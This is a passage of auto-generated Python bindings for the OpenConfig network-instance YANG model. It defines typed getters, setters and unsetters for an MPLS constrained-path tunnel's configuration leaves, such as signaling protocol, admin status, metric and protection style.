"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_signaling_protocol(self):
"""
Getter method for signaling_protocol, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/signaling_protocol (identityref)
YANG Description: Signaling protocol used to set up this tunnel
"""
return self.__signaling_protocol
def _set_signaling_protocol(self, v, load=False):
"""
Setter method for signaling_protocol, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/signaling_protocol (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_signaling_protocol is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_signaling_protocol() directly.
YANG Description: Signaling protocol used to set up this tunnel
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="signaling-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """signaling_protocol must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_RSVP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_SR': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:PATH_SETUP_LDP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), is_leaf=True, yang_name="signaling-protocol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__signaling_protocol = t
if hasattr(self, "_set"):
self._set()
def _unset_signaling_protocol(self):
self.__signaling_protocol = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_RSVP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_SR": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:PATH_SETUP_LDP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
is_leaf=True,
yang_name="signaling-protocol",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_description(self):
"""
Getter method for description, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/description (string)
YANG Description: optional text description for the tunnel
"""
return self.__description
def _set_description(self, v, load=False):
"""
Setter method for description, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/description (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_description is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_description() directly.
YANG Description: optional text description for the tunnel
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """description must be of a type compatible with string""",
"defined-type": "string",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='string', is_config=True)""",
}
)
self.__description = t
if hasattr(self, "_set"):
self._set()
def _unset_description(self):
self.__description = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="description",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="string",
is_config=True,
)
def _get_admin_status(self):
"""
Getter method for admin_status, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/admin_status (identityref)
YANG Description: TE tunnel administrative state.
"""
return self.__admin_status
def _set_admin_status(self, v, load=False):
"""
Setter method for admin_status, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/admin_status (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_admin_status is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_admin_status() directly.
YANG Description: TE tunnel administrative state.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """admin_status must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:ADMIN_DOWN': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:ADMIN_UP': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:ADMIN_UP"), is_leaf=True, yang_name="admin-status", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__admin_status = t
if hasattr(self, "_set"):
self._set()
def _unset_admin_status(self):
self.__admin_status = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_DOWN": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:ADMIN_UP": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:ADMIN_UP"),
is_leaf=True,
yang_name="admin-status",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_preference(self):
"""
Getter method for preference, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/preference (uint8)
YANG Description: Specifies a preference for this tunnel.
A lower number signifies a better preference
"""
return self.__preference
def _set_preference(self, v, load=False):
"""
Setter method for preference, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/preference (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_preference is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_preference() directly.
YANG Description: Specifies a preference for this tunnel.
A lower number signifies a better preference
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """preference must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['1..255']}), is_leaf=True, yang_name="preference", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=True)""",
}
)
self.__preference = t
if hasattr(self, "_set"):
self._set()
def _unset_preference(self):
self.__preference = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["1..255"]},
),
is_leaf=True,
yang_name="preference",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=True,
)
def _get_metric_type(self):
"""
Getter method for metric_type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric_type (identityref)
YANG Description: The type of metric specification that should be used to set
the LSP(s) metric
"""
return self.__metric_type
def _set_metric_type(self, v, load=False):
"""
Setter method for metric_type, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric_type (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric_type() directly.
YANG Description: The type of metric specification that should be used to set
the LSP(s) metric
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric_type must be of a type compatible with identityref""",
"defined-type": "openconfig-network-instance:identityref",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_RELATIVE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_ABSOLUTE': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-types:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mplst:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}, 'oc-mpls-t:LSP_METRIC_INHERITED': {'@module': 'openconfig-mpls-types', '@namespace': 'http://openconfig.net/yang/mpls-types'}},), default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"), is_leaf=True, yang_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='identityref', is_config=True)""",
}
)
self.__metric_type = t
if hasattr(self, "_set"):
self._set()
def _unset_metric_type(self):
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_RELATIVE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_ABSOLUTE": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LSP_METRIC_INHERITED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
},
),
default=six.text_type("oc-mplst:LSP_METRIC_INHERITED"),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="identityref",
is_config=True,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric (int32)
YANG Description: The value of the metric that should be specified. The value
supplied in this leaf is used in conjunction with the metric
type to determine the value of the metric used by the system.
Where the metric-type is set to LSP_METRIC_ABSOLUTE - the
value of this leaf is used directly; where it is set to
LSP_METRIC_RELATIVE, the relevant (positive or negative)
offset is used to formulate the metric; where metric-type
is LSP_METRIC_INHERITED, the value of this leaf is not
utilised
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/metric (int32)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The value of the metric that should be specified. The value
supplied in this leaf is used in conjunction with the metric
type to determine the value of the metric used by the system.
Where the metric-type is set to LSP_METRIC_ABSOLUTE - the
value of this leaf is used directly; where it is set to
LSP_METRIC_RELATIVE, the relevant (positive or negative)
offset is used to formulate the metric; where metric-type
is LSP_METRIC_INHERITED, the value of this leaf is not
utilised
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with int32""",
"defined-type": "int32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['-2147483648..2147483647']}, int_size=32), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='int32', is_config=True)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["-2147483648..2147483647"]},
int_size=32,
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="int32",
is_config=True,
)
def _get_shortcut_eligible(self):
"""
Getter method for shortcut_eligible, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/shortcut_eligible (boolean)
YANG Description: Whether this LSP is considered to be eligible for us as a
shortcut in the IGP. In the case that this leaf is set to
true, the IGP SPF calculation uses the metric specified to
determine whether traffic should be carried over this LSP
"""
return self.__shortcut_eligible
def _set_shortcut_eligible(self, v, load=False):
"""
Setter method for shortcut_eligible, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/shortcut_eligible (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_shortcut_eligible is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_shortcut_eligible() directly.
YANG Description: Whether this LSP is considered to be eligible for us as a
shortcut in the IGP. In the case that this leaf is set to
true, the IGP SPF calculation uses the metric specified to
determine whether traffic should be carried over this LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """shortcut_eligible must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, default=YANGBool("true"), is_leaf=True, yang_name="shortcut-eligible", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__shortcut_eligible = t
if hasattr(self, "_set"):
self._set()
def _unset_shortcut_eligible(self):
self.__shortcut_eligible = YANGDynClass(
base=YANGBool,
default=YANGBool("true"),
is_leaf=True,
yang_name="shortcut-eligible",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_protection_style_requested(self):
"""
Getter method for protection_style_requested, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/protection_style_requested (identityref)
YANG Description: style of mpls frr protection desired: can be
link, link-node or unprotected.
"""
return self.__protection_style_requested
def _set_protection_style_requested(self, v, load=False):
"""
Setter method for protection_style_requested, mapped from YANG variable /network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/protection_style_requested (identityref)
If this variable is read-only (config: false) in the
source YANG file, then _set_protection_style_requested is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_protection_style_requested() directly.
YANG Description: style of mpls frr protection desired: can be
link, link-node or unprotected.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:UNPROTECTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-types:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mplst:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"oc-mpls-t:LINK_PROTECTION_REQUIRED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
"LINK_NODE_PROTECTION_REQUESTED": {
"@module": "openconfig-mpls-types",
"@namespace": "http://openconfig.net/yang/mpls-types",
},
